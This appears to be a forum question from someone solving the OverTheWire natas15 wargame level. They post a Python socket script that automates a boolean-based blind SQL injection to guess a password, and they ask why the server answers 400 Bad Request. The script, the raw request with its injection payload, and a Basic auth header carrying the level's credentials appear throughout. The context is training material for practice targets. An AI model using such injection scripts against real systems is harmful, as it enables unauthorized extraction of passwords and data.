I am trying to do a CTF challenge, to complete it I have to perform a SQL Injection attack. I wanted to automate the attack and "created" a Python script to send HTTP requests with the socket
. However, when doing a first test to see if the packages are sent, I realized that when I try to send them, the server responds with an error 400 Bad Request
. I did a lot of research and even tried with all the headers that are sent in a real request (The headers that were sent were taken from a real request captured with BurpSuite), however, not even with all the headers of a real request did it work for me.
Scripts:
#!/bin/python3
import socket
HOST = "natas15.natas.labs.overthewire.org"
PORT = 80
HEADERS = """POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
Content-Type: application/x-www-form-urlencoded
Content-Length: {content_lenght}\r\n\r\n"""
# guessed: Representa la contraseña obtenida hasta el momento.
POST = 'username=natas16" AND LEFT(password, {guessed_length})="{guessed}'
def boolean_based_SQLI_attack(guessed_password):
sock = socket.socket(family = socket.AF_INET, type = socket.SOCK_STREAM)
sock.connect((HOST, PORT))
FINAL_POST = POST.format(guessed_length = len(guessed_password), guessed = guessed_password)
FINAL_HEADERS = HEADERS.format(content_lenght = len(POST))
request = FINAL_HEADERS + FINAL_POST
print(request, '\n')
sock.send(bytes(request, 'UTF-8'))
response = str(sock.recv(8192), 'UTF-8')
print(response)
sock.close()
if "This user exists." in response:
return True
else:
return False
print(boolean_based_SQLI_attack('W'))
Finally, the request looks like this:
POST /index.php HTTP/1.1
Host: natas15.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
username=natas16" AND LEFT(password, 1)="W
The error:
HTTP/1.1 400 Bad Request
Date: Mon, 11 Jul 2022 23:53:52 GMT
Server: Apache/2.4.10 (Debian)
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at natas.labs.overthewire.org Port 80</address>
</body></html>
I also tried sending different information in the POST request but it didn't work.